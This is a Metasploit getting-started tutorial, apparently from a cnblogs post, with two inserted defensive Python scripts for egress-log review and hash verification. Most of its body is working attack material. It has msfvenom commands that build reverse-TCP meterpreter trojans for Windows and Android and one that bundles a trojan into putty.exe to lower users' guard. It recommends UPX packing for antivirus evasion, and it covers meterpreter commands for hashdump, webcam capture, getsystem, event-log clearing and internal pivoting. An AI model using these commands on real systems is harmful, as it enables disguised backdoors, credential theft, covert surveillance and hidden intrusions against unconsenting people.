Metasploit Getting Started Tutorial

0. Metasploit Overview

Metasploit is an open-source penetration testing framework. To date msf has built in thousands of modules and penetration testing tools related to publicly disclosed vulnerabilities. Modules are written in Ruby, which lets users modify a module as needed or even load test modules they wrote themselves. After selecting the attack module to use, only a few simple commands are needed to configure its parameters and complete the test and exploitation of a vulnerability, which automates and simplifies the penetration process.

1.Metasploit installation

Windows platform

First, download the installer from the official website:
http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe
Default Port: 3650

Close the anti-virus software, then run the installer as administrator. The installation bundles a PostgreSQL database, which stores Metasploit's index of every module so that loading and searching are faster.

After installation a Metasploit shortcut is generated on the desktop. Right-click it and run it as Administrator to open a cmd window and start the Metasploit Console.

Metasploit takes a long time to load when started on Windows; if nothing seems to happen, wait 3-5 minutes.

On the Windows platform Metasploit also provides a web interface for graphical operation.

Linux platform

Obtain it from GitHub:

git clone https://github.com/rapid7/metasploit-framework.git

Switch to the metasploit-framework directory, give msfconsole execute permission and start it:
cd metasploit-framework && chmod +x msfconsole && ./msfconsole

Alternatively, use the following commands to download and run the one-click installer; how long the installation takes depends on the network:

cd /opt &&  curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall

Kali Linux ships with Metasploit and the automation tool Armitage.

Android platform

Installing Metasploit on Android actually means installing a Linux subsystem on Android and then installing Metasploit on top of it. The process is complex and cumbersome, but during a penetration test in an enterprise network environment, carrying a laptop to access the network may be too conspicuous, and Metasploit on an Android phone or tablet may well be a good option in that case.

Prerequisite: the Android phone or tablet needs root privileges.

Usually Termux is chosen as the base environment. The system will start downloading things, and how long this takes depends on the network environment, so you can take a nap or something in the meantime =. =#

Termux uses the apt package manager; execute the following command to update:

apt-get update && apt-get upgrade -y && apt dist-upgrade -y

The subsequent Metasploit installation is the same as on the Linux platform.

2. Penetration testing with Metasploit

Commonly used commands at the system terminal

msfdb init                              initialize the msf database
apt install metasploit-framework        update msf
msfvenom                                multi-platform attack payload generator
msf-nasm_shell                          convert assembly instructions into the corresponding hexadecimal machine code
msfconsole                              open the msf console

Commonly used commands at the msf console

db_status           check the msf database connection status; a connected database speeds up searching and other operations

db_rebuild_cache    rebuild the cache, re-storing the module index in the database

db_nmap             invoke an nmap scan and store the results in the database

help [db_connect]   show the help for a command

search [module]     search for modules containing a keyword

use [module]        select a module to use (ms17_010 EternalBlue as an example)

show payloads       show the payloads supported by this module

show options        show the parameters this module needs (those with required = no are optional)

info                if the output of the show commands is not complete enough, type info to view the full details

set [opt]           after selecting a module, set the value of a parameter it needs (unset removes the value)

setg [opt]          set a global parameter; parameters such as IP addresses can be set globally so they do not need to be set again after switching modules (unsetg removes them)

back                return to the previous context

exploit/run         both commands run the attack module

sessions            list the currently connected sessions

3. Generating a Trojan file with msfvenom

On payload selection: for various reasons such as firewalls, the target host may restrict access from the external network to some of its ports, or even open only a few ports and close all the others. In this case having the target host connect back to the attacker is the better choice; in this model the target host itself makes the outbound connection request, which looks like normal traffic, so the security settings can be bypassed. A reverse payload is therefore the popular choice when selecting a payload.
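The defensive counterpart to the reverse-connection model described above is to log and review outbound connections, since inbound firewall rules never see a connect-back. The following script is an added example, not code from the original post or from the Metasploit project: it parses firewall log lines in a format assumed for the demo (`<timestamp> <ALLOW|DENY> <proto> <src_ip>:<src_port> -> <dst_ip>:<dst_port>`, not any vendor's real syntax) and reports internal hosts that reached external addresses on ports outside an egress allowlist. The internal subnets are the two that appear later on this page (192.168.16.0/24 and 169.254.0.0/16); the allowlist and all log lines are constructed. Note that in the page's own lab the handler sits on the same LAN as the target, so this check would not fire there; it targets the internet-egress case the paragraph above describes. The check is "port not on the allowlist" rather than "port equals 4444" because a handler can listen on any port.

```python
"""Flag allowed internal->external TCP flows on non-allowlisted ports.

Added example (not part of the original post). Log format, subnets,
allowlist and sample lines are assumptions constructed for the demo.
"""
import ipaddress
import re
from collections import Counter
from typing import Dict, List, Tuple

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ALLOW|DENY)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Internal ranges taken from this page's lab (assumption: nothing else is internal).
INTERNAL_NETS = [
    ipaddress.ip_network("192.168.16.0/24"),
    ipaddress.ip_network("169.254.0.0/16"),
]

# Ports workstations are expected to reach on the internet (constructed policy).
EGRESS_ALLOWLIST = {53, 80, 443}


def parse_line(line: str) -> Dict[str, object]:
    """Parse one log line into a dict; raise ValueError on anything unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparsable log line: {line!r}")
    d = m.groupdict()
    return {
        "ts": d["ts"], "action": d["action"], "proto": d["proto"],
        "src": ipaddress.ip_address(d["src"]), "sport": int(d["sport"]),
        "dst": ipaddress.ip_address(d["dst"]), "dport": int(d["dport"]),
    }


def is_internal(ip: ipaddress.IPv4Address) -> bool:
    return any(ip in net for net in INTERNAL_NETS)


def find_suspicious_egress(lines: List[str], min_count: int = 1) -> List[Tuple[str, str, int, int]]:
    """Return (src, dst, dport, count) for ALLOWed internal->external TCP flows
    whose destination port is not allowlisted, seen at least min_count times.
    Sorted by count descending so repeated (beacon-like) flows come first."""
    counts: Counter = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec["action"] != "ALLOW" or rec["proto"] != "TCP":
            continue
        if not is_internal(rec["src"]) or is_internal(rec["dst"]):
            continue  # only internal -> external flows matter here
        if rec["dport"] in EGRESS_ALLOWLIST:
            continue
        counts[(str(rec["src"]), str(rec["dst"]), rec["dport"])] += 1
    return sorted(
        [(s, d, p, c) for (s, d, p), c in counts.items() if c >= min_count],
        key=lambda t: (-t[3], t[0], t[1], t[2]),
    )


# Constructed sample log: normal web and DNS traffic, one blocked attempt,
# an inbound connection, and a workstation repeatedly reaching an
# external host on port 4444 (the example lport used on this page).
SAMPLE_LOG = """
2019-07-28T10:00:01 ALLOW TCP 192.168.16.59:51234 -> 203.0.113.10:443
2019-07-28T10:00:02 ALLOW UDP 192.168.16.59:51235 -> 203.0.113.53:53
2019-07-28T10:00:05 ALLOW TCP 192.168.16.59:51240 -> 203.0.113.20:4444
2019-07-28T10:00:35 ALLOW TCP 192.168.16.59:51241 -> 203.0.113.20:4444
2019-07-28T10:01:05 ALLOW TCP 192.168.16.59:51242 -> 203.0.113.20:4444
2019-07-28T10:01:10 DENY  TCP 192.168.16.60:51300 -> 203.0.113.30:8080
2019-07-28T10:01:12 ALLOW TCP 203.0.113.40:44321 -> 192.168.16.61:443
""".strip().splitlines()

if __name__ == "__main__":
    for src, dst, port, n in find_suspicious_egress(SAMPLE_LOG):
        print(f"{src} -> {dst}:{port}  {n} connection(s)")
```

Run against the sample log, only the three connections from 192.168.16.59 to 203.0.113.20:4444 are reported; the denied attempt, the UDP DNS lookup, the HTTPS flow and the inbound connection are all filtered out. Raising `min_count` lets a reviewer focus on hosts that reconnect repeatedly, which is what a connect-back that keeps retrying looks like in egress logs.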

Usually windows/meterpreter_reverse_tcp is used for 32-bit targets and windows/x64/meterpreter_reverse_tcp for 64-bit targets. Of course, different payloads still need to be selected according to different needs.
To view the list of available payloads / encoders / nops / everything:

msfvenom -l [payloads|encoders|nops|all]

View the Trojan file formats that can be generated, and use -f to specify the format when generating the Trojan:

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -a x64 -f exe -o backdoor_raw.exe

Generating an Android Trojan:

msfvenom -p android/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -o backdoor_raw.apk

In the msf console, listen for the connect-back:

use exploit/multi/handler           this module receives the connect-back session; usually only the listening host and port need to be set

4. Trojan anti-virus evasion

Using multiple encoders for several rounds of encoding
Not recommended: the evasion rate is poor, encoding takes a long time, and the resulting Trojan may not run, or may run but fail to connect back to the attacker.
"-f raw" means generating the raw Trojan. In such a pipeline the generated Trojan only needs to be passed on to the next stage, so the output format only needs to be specified in the last command, and raw should be used before that.

Bundling into a normal file
Recommended: bundling the Trojan into a normal file makes users relax their vigilance. In real life we should pay attention to comparing a file's hash value with the official one.
Choose the bundling target carefully; the file may fail to run after bundling, in which case try using an encoder or change the bundling target. The example here uses putty.

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -x putty.exe -k -f exe -o backdoor_putty.exe
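The advice above to compare a file's hash with the official one is the user-side check against exactly this kind of bundling. As an added example, not code from the original post or from any project named on it, the script below parses a manifest in the common `sha256sum` output format (`<hex digest>  <filename>` per line, as vendors often publish) and verifies downloaded files against it, distinguishing a matching file, a modified one and one the manifest lists but that was never downloaded. The manifest, the "official" bytes and the "tampered" bytes are all constructed for the demo; the digests are computed at import time so it runs offline.

```python
"""Verify downloaded binaries against a published SHA-256 manifest.

Added example (not from the original post). The manifest format is the
'sha256sum' text format; all file contents below are constructed.
"""
import hashlib
import hmac
from typing import Dict

HEX = set("0123456789abcdef")


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse 'sha256sum'-style lines into {filename: hex_digest}.

    Blank lines and '#' comments are skipped. A line that does not look like
    '<64 hex chars>  <name>' raises ValueError instead of being ignored, so a
    truncated or corrupted manifest is noticed rather than silently trusted.
    """
    entries: Dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"manifest line {lineno}: expected '<digest>  <file>'")
        digest, name = parts
        name = name.lstrip("*").strip()  # sha256sum marks binary mode with '*'
        digest = digest.lower()
        if len(digest) != 64 or any(c not in HEX for c in digest):
            raise ValueError(f"manifest line {lineno}: bad SHA-256 digest")
        entries[name] = digest
    return entries


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_files(manifest: Dict[str, str], files: Dict[str, bytes]) -> Dict[str, str]:
    """Return {filename: 'ok' | 'MISMATCH' | 'missing'} for every manifest entry."""
    results: Dict[str, str] = {}
    for name, expected in manifest.items():
        data = files.get(name)
        if data is None:
            results[name] = "missing"
            continue
        actual = sha256_hex(data)
        # constant-time comparison; not strictly needed for hashes, but a good habit
        results[name] = "ok" if hmac.compare_digest(actual, expected) else "MISMATCH"
    return results


# --- constructed demo data (stand-ins, not real PuTTY binaries) ---
OFFICIAL_PUTTY = b"MZ\x90\x00constructed stand-in for an official putty.exe"
TAMPERED_PUTTY = OFFICIAL_PUTTY + b"\x00extra bytes appended by a bundler"
OFFICIAL_PLINK = b"constructed stand-in for plink.exe"

DEMO_MANIFEST = (
    "# constructed SHA256SUMS for the demo\n"
    f"{sha256_hex(OFFICIAL_PUTTY)}  putty.exe\n"
    f"{sha256_hex(OFFICIAL_PLINK)} *plink.exe\n"
)


def demo() -> Dict[str, str]:
    """Check a download set where putty.exe was altered and plink.exe is absent."""
    manifest = parse_manifest(DEMO_MANIFEST)
    downloads = {"putty.exe": TAMPERED_PUTTY}
    return verify_files(manifest, downloads)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:9s} {name}")
```

Because a bundled executable differs from the vendor's build by at least the embedded payload, its SHA-256 will never match the published digest; the parser also refuses manifests with malformed digests so that a corrupted or shortened checksum file cannot pass as a successful verification.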

Packing
Recommended: packing circumvents anti-virus detection to a certain extent. The example here packs with upx, which is commonly used on Linux; on Windows there are many tools to choose from.
upx -5 backdoor_raw.elf        -5 is the compression level (1-9); see upx -h for details
The methods above can be used in combination.
Online Trojan testing site: http://www.virscan.org/


5. Post-exploitation with meterpreter

After the exploit/multi/handler listener module has established a connection with the target host, meterpreter can be used for post-exploitation.

pwd                 print the current working directory

sysinfo             view system information

ps                  list the processes running on the target and their PIDs

webcam_snap         take a photo with the camera (webcam_stream emulates a video recorder through the browser for real-time monitoring)

run vnc             run VNC to view the screen remotely (run screen_unlock for remote control)

run post/windows/manage/enable_rdp          if the target is Windows, use this command to enable Remote Desktop on port 3389 of the target

screenshot          capture the target's current screen

getuid              get the user ID of the current privileges

getsystem           obtain SYSTEM privileges

hashdump            obtain usernames and password hashes

shell               get a shell on the target (fix for garbled Chinese in a Windows shell: chcp 65001)

Ctrl+Z              exit shell mode and return to meterpreter

upload              upload a file

download            download a file

execute             run a file on the target system (-f specifies the file, -i interactive mode, -H hide the window)

clearev             clear the event logs

background          put Meterpreter in the background (use sessions -i to reconnect to the session)

6. Overview of internal network penetration with Meterpreter

During a penetration, when you gain control of a host that is connected to the public network, that host may also be connected to an internal LAN whose other hosts have no access to the outside. This is a very common LAN pattern: the hosts that cannot connect to the outside network usually store some sensitive documents, and the controlled host can now serve as a springboard for an attacker to reach the internal network and carry out internal network penetration.
Adding a route to reach the internal network

run get_local_subnets                   get the subnets on the target host; 192.168.16.0 is the same segment as the attacking machine, and 169.254.0.0 is VirtualBox's internal network adapter mode

run autoroute -s 169.254.0.0/16 1        use the autoroute module to add a route to the internal network, forwarded through session 1

run autoroute -p                         view the current routing table; traffic to the 169.254.0.0 segment will be forwarded through session 1

Next, db_nmap can be used within msf to scan for live hosts in the internal network and attack their open ports.
portfwd port forwarding
Port forwarding forwards an internal network port to a port on the local host, equivalent to VirtualBox's port mapping feature.
portfwd -h                                          view the help

portfwd add -l 7070 -r 192.168.16.59 -p 3389        forward port 3389 of target host 192.168.16.59 to port 7070 on the local host

rdesktop 127.0.0.1:7070                             once port forwarding succeeds, connect to RDP through the local port

Reference books: "Metasploit: The Penetration Tester's Guide", "Metasploit Penetration Testing Guide (Revised Edition)"


Origin www.cnblogs.com/dyanbk/p/11258303.html